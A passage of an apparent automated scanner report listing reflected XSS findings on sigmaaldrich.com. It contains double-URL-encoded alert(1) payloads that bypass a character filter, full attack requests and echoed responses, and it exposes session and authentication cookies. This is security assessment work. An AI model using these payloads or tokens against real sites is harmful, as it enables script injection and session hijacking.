Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:06 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science8080f";alert(1)//2611162ee43/custom-oligos","E404") ;
   </script>
...[SNIP]...

1.108. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/custom-oligos [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/custom-oligos

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a731c%2522%253balert%25281%2529%252f%252fe03672b8d7c was submitted in the REST URL parameter 5. This input was echoed as a731c";alert(1)//e03672b8d7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/custom-oligosa731c%2522%253balert%25281%2529%252f%252fe03672b8d7c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:08 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/custom-oligosa731c";alert(1)//e03672b8d7c","E404") ;
   </script>
...[SNIP]...

1.109. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bce0%2522%253balert%25281%2529%252f%252f5946943de71 was submitted in the REST URL parameter 1. This input was echoed as 9bce0";alert(1)//5946943de71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content9bce0%2522%253balert%25281%2529%252f%252f5946943de71/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:57 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content9bce0";alert(1)//5946943de71/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services","E404") ;
   </script>
...[SNIP]...

1.110. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63598%2522%253balert%25281%2529%252f%252f06fd2fe8eb1 was submitted in the REST URL parameter 2. This input was echoed as 63598";alert(1)//06fd2fe8eb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich63598%2522%253balert%25281%2529%252f%252f06fd2fe8eb1/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:59 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich63598";alert(1)//06fd2fe8eb1/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services","E404") ;
   </script>
...[SNIP]...

1.111. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b534%2522%253balert%25281%2529%252f%252f0dadcd087aa was submitted in the REST URL parameter 3. This input was echoed as 3b534";alert(1)//0dadcd087aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest3b534%2522%253balert%25281%2529%252f%252f0dadcd087aa/life-science/functional-genomics-and-rnai/shrna/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:01 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest3b534";alert(1)//0dadcd087aa/life-science/functional-genomics-and-rnai/shrna/custom-services","E404") ;
   </script>
...[SNIP]...

1.112. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66369%2522%253balert%25281%2529%252f%252f24dc9edba80 was submitted in the REST URL parameter 4. This input was echoed as 66369";alert(1)//24dc9edba80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science66369%2522%253balert%25281%2529%252f%252f24dc9edba80/functional-genomics-and-rnai/shrna/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
